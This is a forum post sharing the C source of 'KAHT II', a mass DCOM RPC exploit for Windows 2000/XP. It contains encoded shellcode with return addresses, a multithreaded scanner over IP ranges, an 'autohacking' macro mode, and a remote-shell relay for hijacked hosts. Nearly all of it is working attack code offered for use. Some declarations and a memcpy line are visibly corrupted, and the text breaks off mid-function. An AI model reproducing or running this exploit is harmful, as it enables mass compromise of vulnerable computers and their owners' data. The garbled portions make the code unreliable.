
KAHT II - MASSIVE RPC EXPLOIT (masih lumayan loh) hihihi...

Posted: Thu Jun 25, 2009 11:10 pm
by wiLMaR_kiDz


/*

   __________________________________________________
             KAHT II - MASSIVE RPC EXPLOIT
     DCOM RPC exploit. Modified by [email protected]
      #haxorcitos && #localhost  @Efnet Ownz you!!!
     REALLY PRIVATE VERSION (BETA 11) - AUTOHACKING
  Ported to Linux by Croulder croulder[at]croulder.com
   __________________________________________________



*/


[size=85]#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>


#ifdef WIN32
 #include <unistd.h>
 #include <windows.h>
 #include <process.h>
 #include <winsock2.h>
 #include <tcconio.h>
 #pragma comment (lib,"ws2_32.lib")
#else
#include <pthread.h>
#include <sys/types.h>
 #include <sys/ipc.h>
 #include <sys/sem.h>
#include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>
 #include <netdb.h>
 #include <fcntl.h>
 #include <unistd.h>
#endif

#define MAX_THREADS 			512
#define NTHREADS			50
#define PORT 				139
#define CONNECT 			6		//Connect Timeout
#define RECV 				5		//recv Timeout
#define ATTACKTIMEOUT 			5		//
#define RPC_FINGERPRINT_TIMEOUT         6		//rpc fingerprint
#define INITRPORT                     (rand()/2)+32767
//#define INITRPORT         		53		//PORT TO SPAWN A SHELL


/* Shared state used by the scanner and exploit threads.
 * RPORT:       port the remote shell is expected on; set once in main() from INITRPORT
 * salir:       "exit" flag shared between shell() and the readconsole() thread
 * AUTOHACKING: argv[4]; when non-zero readconsole() runs macro '9' instead of reading stdin
 * threads:     number of live checkea() workers (guarded by css)
 * rpcopen:     hosts whose port accepted the connect (guarded by cslog) */
int RPORT,salir=0,AUTOHACKING=0,threads=0,rpcopen=0;
/* ip1: start address, advanced in place by givemeip(); ip2: last address of the range.
 * Both are four octets parsed by main() and range-checked to 0..255. */
int ip1[4],ip2[4];
FILE *results;	//results.txt: IPs with port 139 open :D  (written by checkea() under cslog)
#ifndef WIN32
#define CRITICAL_SECTION pthread_t	// NOTE(review): only the type is mapped; Enter/LeaveCriticalSection are not defined for this case anywhere in the visible file
#endif
// NOTE(review): this declaration is corrupted in the copy as received (`cs` appears twice and one
// name is mojibake); the rest of the file refers to cs, css, cslog and csshell.
CRITICAL_SECTION cs,cs,ãsÿo,csshell; //Givemeip CS, number of threads, ipstologfile,shell()



//Ultra Fast port Scanner
char *givemeip(char *ip);		// next address of the range as dotted-quad text, NULL when exhausted
void checkea(void *threadn);		// scanner worker thread body
//Macro Functions..
void show_macros(int sock2);		// print the name=/key= entries of macros.txt
void execute_macro(char opt,int sock2);	// replay the cmd= lines of the macro keyed by opt over sock2
void macro(char opt, int sock2);	// dispatcher for the two above
//Exploit Code...
void attack(char *linea,int peta);	// peta: index into targets[] from version(), or -1 to do nothing
int shell (int sock2);			// interactive relay until the shared salir flag is set
void readconsole(void *sock2);		// stdin -> socket thread body started by shell()
//me
void banner(void);
// remote  Install
int InstallRemoteServiceNbt (char *ip);	// NOTE(review): declared but neither defined nor called in the visible file
int InstallRemoteServiceFtp (char *ip);	// NOTE(review): declared but neither defined nor called in the visible file


/* Hard-coded DCERPC bind PDU (leading bytes 0x05 0x00 0x0B: RPC version 5, packet
 * type 11 = bind). attack() sends it unchanged on the port-139 connection before
 * the payload; the bytes are opaque here and are never modified at run time. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char winshellcode[]=
  "\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00"
  "\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00"
  "\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae"
  "\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00"
  "\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00"
  "\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20"
  "\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00"
  "\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00"
  "\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00"
  "\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
  "\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
  "\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57"
  "\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
  "\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00"
  "\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
  "\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00"
  "\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00"
  "\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
  "\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
  "\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00"
  "\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00"
  "\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93"
  "\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00"
  "\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00"
  "\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00"
  "\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00"
  "\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a"
  "\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00"
  "\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
  "\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff"
  "\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00"
  "\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  "\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  "\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
  "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3"
  "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00"
  "\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00"
  "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00"
  "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00"
  "\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
  "\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00"
  "\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00"
  "\x07\x00\x00\x00\x00\x00\x00\x00";

/* Per-OS table consulted by attack(): `os` is only used for the progress message,
 * `ret` is the 4-byte value attack() copies into the payload. The index is the
 * value version() returns — attack() logs index 0 to win2k.txt and anything
 * else to winxp.txt. `u_long` is a BSD/Windows typedef, not standard C. */
struct
{
  char *os;
  u_long ret;
} targets[] =
   {
	  { "[Win2k]", 0x0018759F },
  	  { "[WinXP]", 0x0100139d },
	};



//GLOBALS...

/******************************************************************/

/* Print the fixed program header to stdout, one line per entry, in order. */
void banner(void)
{
	static const char *const header[] = {
		"_________________________________________________        \n",
		"           KAHT II - MASSIVE RPC EXPLOIT\n",
		"  DCOM RPC exploit. Modified by [email protected]\n",
		"  #haxorcitos && #localhost  @Efnet Ownz you!!!\n",
		"              PUBLIC VERSION :P\n",
		"________________________________________________\n\n",
	};
	size_t k;

	for (k = 0; k < sizeof header / sizeof header[0]; k++) {
		fputs(header[k], stdout);	/* no format directives in any entry, so fputs == printf here */
	}
}
/* Print the command-line synopsis to stdout and terminate the process with
 * status 1. Never returns. */
void usage(void)
{
	static const char *const help[] = {
		" Usage:   KaHt2.exe IP1 IP2 [THREADS] [AH]\n",
		" example: KaHt2.exe 192.168.0.0 192.168.255.255\n",
		"\n  NEW!: Macros Available in shell enviroment!!\n  Type !! for more info into a shell.\n",
	};
	size_t k;

	for (k = 0; k < sizeof help / sizeof help[0]; k++) {
		fputs(help[k], stdout);
	}
	exit(1);
}


/******************************************************************/
/*****************************************************************/
/* Replay the macro keyed by `opt` from ./macros.txt over sock2.
 * The file is scanned line by line: "delay=N" sets the wait between commands,
 * "key=!c" selects the macro whose c equals opt, and every later "cmd=..." line
 * is sent with "\r\n" appended until the next "[Macro]" header is reached.
 * After the scan a bare "\n" is sent; the function then sleeps 25 and returns.
 * Return values of fgets(), send() and fclose() are not checked. */
void execute_macro(char opt,int sock2){

	FILE *macro;
	char cadena[512];	// current line of macros.txt (fgets reads at most 510 chars into it)
	char tmp[512];		// command text plus "\r\n"; fits because cadena+4 is at most 506 chars
	int found=0;		// 1 once the key= line matching opt has been seen
	int delay=500;	//configurable TIMEOUT FOR CMDS - Default=500
	// NOTE(review): delay is passed to sleep(), whose unit is seconds on POSIX; the 500 default
	// reads like milliseconds — confirm which platform/sleep the author built against.
	if ((macro=fopen("macros.txt","r")) !=NULL)
	{
		while (!feof(macro))	// feof-before-read: after the last line fgets fails and the body runs once more on the zeroed buffer
		{
				memset(cadena,'\0',sizeof(cadena));
				fgets(cadena,sizeof(cadena)-1,macro);
				cadena[strlen(cadena)-1]='\0';	// strips the newline; on an empty buffer strlen is 0 and the index wraps to (size_t)-1 — out-of-bounds write
				if ((found==1) && ((   strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
			            {
				        fclose(macro);
					printf(" + Ejecucion de La Macro Terminada\n");
					fclose(macro);return;}	// NOTE(review): the stream was already closed two lines above; closing it twice is undefined behaviour
				        if ((   strncmp(cadena,"delay=",strlen("delay="))) ==0)
					    delay=atoi(cadena+6);	// 6 == strlen("delay="); atoi gives 0 on garbage

				        if  ((   strncmp(cadena,"key=",strlen("key="))) ==0)
				   	   if (( cadena+strlen("key=!"))[0]==opt)	// compares the byte after "key=!" with opt, i.e. assumes the line is "key=!c"
						   found=1; //OUR CMDS ARE HERE! :)

				        if  ( ((   strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
				           if (strlen(cadena)>strlen("cmd= "))	// ignore "cmd=" lines with no command text
						{
							strcpy(tmp,cadena+4);	// 4 == strlen("cmd=")
							strcat(tmp,"\r\n");
				 			send(sock2,tmp,strlen(tmp),0);
							//printf("Sent: %s! size: %i\n",tmp,sizeof(tmp));
							sleep(delay);
						}
		}
		fclose(macro);
		send(sock2,"\n",strlen("\n"),0);
		printf(" - Macro Done -\n");
	}

	sleep(25);	// same unit caveat as delay above




}

/*****************************************************************/
/* Print the name=/key= lines of ./macros.txt as a menu on stdout, then send a
 * bare "\n" on sock2 and sleep 10. Lines of one character or fewer are skipped,
 * which also keeps the strlen()-1 index below from running on an empty buffer.
 * Return values of fgets(), send() and fclose() are not checked. */
void show_macros(int sock2){
	FILE *macro;
	char cadena[512];	// current line of macros.txt

	printf(" +______________(Available Macros)______________\n");
	if ((macro=fopen("macros.txt","r")) !=NULL)
	{
		while (!feof(macro))	// feof-before-read: the body runs once more after the last line, on the zeroed buffer
		{
				memset(cadena,'\0',512);	// literal size, same as sizeof(cadena)
				fgets(cadena,sizeof(cadena)-1,macro);
				if (strlen(cadena)>1)
				{
				cadena[strlen(cadena)-1]='\0';	// strip the newline (also drops the last character of an unterminated final line)
				if  ((   strncmp(cadena,"name=",strlen("name="))) ==0)
					printf(" + Nombre: %s ",cadena+strlen("name="));
				if  ((strncmp(cadena,"key=",strlen("key="))) ==0)
					printf("Trigger: %s\n",cadena+strlen("key="));
			}
		}
		fclose(macro);
	}
	send(sock2,"\n",strlen("\n"),0);
	sleep(10);	// seconds on POSIX sleep()

}
/*****************************************************************/



/* Dispatch a "!c" console request: "!!" lists the available macros, any other
 * character c replays the macro keyed by c on sock2. */
void macro(char opt, int sock2)
{
	if (opt == '!') {
		show_macros(sock2);
		return;
	}
	execute_macro(opt, sock2);
}



/*****************************************************************/
/* Thread body started by shell(): forward console input to the shell socket.
 * sock2 carries a socket descriptor smuggled through the void* argument and is
 * cast back with (int) (a pointer-to-int narrowing on 64-bit builds).
 * A read of exactly three bytes beginning with '!' ("!c\n") is treated as a
 * macro request for c; anything else is sent to the socket verbatim. Input
 * starting with "exit" sets the shared salir flag and ends the thread; EOF or a
 * read error also sets salir. With AUTOHACKING set, macro '9' is replayed
 * instead and the read loop is skipped entirely. */
void readconsole(void *sock2)
{
	int     l;
    char    buf[512];

if (AUTOHACKING) {
	execute_macro('9',(int) sock2);
	salir=1;
	}

	while(!salir)
	{
    	l = read (0, buf, sizeof (buf));	// raw read from fd 0 (stdin); no line buffering
		if (l <= 0)
			salir=1;
		else
		{
  			if ( (l==3) && (buf[0]=='!') )
	  			macro(buf[1],(int)sock2);
  			else
	   		{
				send((int)sock2,buf,l,0);	// return value unchecked
				if (strncmp(buf,"exit",strlen("exit")) ==0)
				{
					salir=1;
					_endthread();	// Windows CRT; no POSIX equivalent is provided in the visible file
				}
			}
		}
	}

}

/* Thread body: wait, replay macro 9 on sock2, flag the session closed, end the thread.
 * NOTE(review): not referenced anywhere in the visible file, and the argument is the
 * integer 9 rather than the character '9' that readconsole() passes for the same
 * macro — confirm which value is intended. */
void enviamacro(void *sock2)
{
sleep(500);	// seconds on POSIX sleep()

macro(9,(int)sock2);
salir=1;
_endthread();	// Windows CRT


}

/****************************************************************/
/* Interactive relay for an established connection on sock2.
 * Starts readconsole() on a second thread (stdin -> socket) and, on this
 * thread, copies whatever arrives on the socket to fd 1 (stdout) until the
 * shared salir flag is set. A recv() result of 0 or less (peer closed, error,
 * or nothing pending on a non-blocking socket) only sleeps and retries, so the
 * loop ends solely through salir. Returns the final value of salir. */
int shell (int sock2) /* NOT RIPPED FROM TESO :P */
{
	int     l;
    char    buf[512];
	salir=0;
	_beginthread(readconsole,4096,(void *)(int) sock2);	// Windows CRT thread; the descriptor is passed as a pointer-sized integer
    while (!salir)
	{
		if ((l=recv (sock2, buf, sizeof (buf),0))>0)
		write (1, buf, l);	// return value unchecked
		else sleep(100);	// also taken after the peer closes the socket; seconds on POSIX sleep()

	}
	printf("\n - Connection Closed\n");
	return (salir);
}
/*****************************************************************/

/* Entry point. argv[1]/argv[2]: first and last dotted-quad address of the range;
 * argv[3]: worker count (default NTHREADS); argv[4]: AUTOHACKING flag.
 * Opens results.txt for writing, picks RPORT at random, starts the workers
 * (Windows only) and waits until the live-thread counter drops to zero. */
int main(int argc, char **argv)
{
	 int i,total=NTHREADS;

    #ifdef WIN32
	WSADATA ws;

	clrscr();
    #endif
	banner();

	if(argc<3)
		usage();
    #ifdef WIN32
    if (WSAStartup(MAKEWORD(2,0),&ws)!=0)
    {
        printf("  WSAStartup Error: %d\n",WSAGetLastError());
        exit(1);
    }
    #endif
	// sscanf return values are unchecked: octets that fail to parse keep their
	// zero-initialised global value and therefore pass the range check below
	sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
	sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);

	for(i=0;i<4;i++)
	{
		if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
		if ( (ip2[i]>255) || (ip2[i]<0) ) usage();

	}
	// total is only read when argc is exactly 4, so with a fifth argument present the
	// thread count argument is ignored; it is also never bounded against MAX_THREADS
	// (defined above but unused), and 0 or a negative value starts no workers
	if (argc==4) 	total=atoi(argv[3]);
	if (argc==5) 	AUTOHACKING=atoi(argv[4]);

#ifdef WIN32
	InitializeCriticalSection(&cs);
	InitializeCriticalSection(&css);
	InitializeCriticalSection(&cslog);
	InitializeCriticalSection(&csshell);
#else
	//Linux threads and semaphores go here :D  (left unimplemented)
#endif
	//ULTRA FAST PORT SCANNER....
	if ((results=fopen("results.txt","w"))==NULL) exit(0);	// exits with status 0 on failure
	printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
	srand ( time(NULL) );  RPORT=INITRPORT;	// INITRPORT expands to (rand()/2)+32767
	printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
	printf(" [+] Scan In Progress...\n");
	// The for has no braces: on WIN32 its body is the _beginthread call; on the other
	// branch the preprocessor leaves nothing here and the while loop below becomes the body.
	for(i=0;i<total;i++)
              #ifdef WIN32
		_beginthread(checkea,8192,(void *)i);
	      #else
	        //Linux threads and semaphores go here :D  (left unimplemented)
              #endif
	while(threads>0)	// workers increment `threads` only after a sleep(1) in checkea(), so this test may run while it is still 0 — confirm
	   sleep(100);
   fclose(results);
   printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);

return(0);
}


/****************************************************************************************/

//void attack(char *linea,int peta)
/* Connect to one host on port 139, send bindstr and then the payload, and hand a
 * returning connection on RPORT to shell().
 * linea: dotted-quad address; it is also mutated (a "\n" is appended) and used as
 *        the log line for win2k.txt / winxp.txt.
 * peta:  index into targets[] as returned by version(); -1 returns immediately.
 * The whole body runs under csshell, so only one host is handled at a time.
 * NOTE(review): the non-WIN32 branch declares `struct time_t tv`; time_t is a
 * typedef, not a struct tag, so that branch does not compile — the Linux port
 * is incomplete. ioctlsocket()/FIONBIO are Windows socket API calls as well. */
void attack(char *linea,int peta)
{
if (peta==-1)	return;	// version() got no usable reply


// if (AUTOHACKING!=1)
       #ifdef WIN32
	struct timeval tv;
       #else
	struct time_t tv;
       #endif
	struct sockaddr_in target_ip;
	int sock,sock2; //Exploit Socket && Shell Socket
	unsigned short port =  139;

	unsigned short lportl=666; /* drg */
        char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */	// exactly 4 bytes, no terminating NUL (legal C, but not a string)
   	unsigned char buf1[0x1000];
	u_long tmp=1; //TIMEOUTS  (used as the FIONBIO on/off argument)
	FILE *w2k;
	FILE *wxp;
	int i;
	fd_set fds;
	//linea[strlen(linea-1)]='\0';

	EnterCriticalSection(&csshell);

	target_ip.sin_family = AF_INET;
   	target_ip.sin_addr.s_addr = inet_addr(linea);
        target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
    {
		printf(" - Connecting to %s\n",linea);

		tmp=1;
		ioctlsocket( sock, FIONBIO, &tmp);	// non-blocking for the timed connect
		tv.tv_sec = CONNECT;
		tv.tv_usec = 0;
		FD_ZERO(&fds);
		FD_SET(sock, &fds);

	    connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));	// return value unchecked; completion is inferred from the select below
		//if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
		// if (i!=0)
		if((i=select(sock+1,0,&fds,0,&tv))>0)	// writable within CONNECT seconds is taken as connected
	   	 {
		   printf("   Sending Exploit to a %s Server...",targets[peta].os);
		   tmp=0;
		   ioctlsocket( sock, FIONBIO, &tmp);	// back to blocking for the send
    		if (send(sock,bindstr,sizeof(bindstr),0)>0)
    		{
				tmp=1;
		   		ioctlsocket( sock, FIONBIO, &tmp);
				tv.tv_sec = RECV;
				tv.tv_usec = 0;
				FD_ZERO(&fds);
				FD_SET(sock, &fds);
				if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
				{
		   			recv(sock, buf1, 1000, 0);	// bind reply is read and discarded

					lportl=htons(RPORT);
					memcpy(&lport[1], &lportl, 2);
					*(long*)lport = *(long*)lport ^ 0x9432BF80;	// type-punning a 4-byte char array through long: alignment/aliasing UB, and on LP64 `long` is 8 bytes so this reads and writes past lport[]
					memcpy(&winshellcode[1351],&lport,4);
					memcpy(winshellcode+916, (unsigned char *	  tAr ets[peta].ret, 4);	// NOTE(review): this line is corrupted in the copy as received and does not compile
					tmp=0;
			   		ioctlsocket( sock, FIONBIO, &tmp);

					send(sock,winshellcode,1705,0);	// hard-coded length rather than sizeof; return value unchecked
    				sleep(50);	// seconds on POSIX sleep()
					if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
					{
						target_ip.sin_family = AF_INET;
	   					target_ip.sin_addr.s_addr = inet_addr(linea);
	   					target_ip.sin_port = htons(RPORT);
						tmp=1;
						ioctlsocket( sock2, FIONBIO, &tmp);	// sock2 stays non-blocking for the rest of its life, including inside shell()
						tv.tv_sec = CONNECT;
						tv.tv_usec = 0;
						FD_ZERO(&fds);
						FD_SET(sock2, &fds);
	    				connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
						if((i=select(sock+1,0,&fds,0,&tv))>0)
						{
						  printf("\n - Conectando con la Shell Remota...\n\n");
						  salir=0;
						  shell(sock2);	// blocks for the whole interactive session (csshell is still held)
                                               #ifdef WIN32
						  closesocket(sock2);
                                               #else
						  close(sock2);
